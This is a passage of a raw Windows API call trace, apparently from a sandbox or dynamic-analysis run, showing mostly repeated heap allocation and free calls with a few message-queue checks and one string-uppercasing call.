[0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0180.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0180.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0180.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0180.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0180.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0180.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0180.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0180.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0180.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0180.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0180.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0180.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0180.205] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0180.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0180.205] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0180.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0180.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0180.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0180.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0180.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0180.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0180.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0180.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0180.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0180.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0180.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0180.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.208] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0180.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0180.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0180.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0180.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0180.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0180.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0180.210] 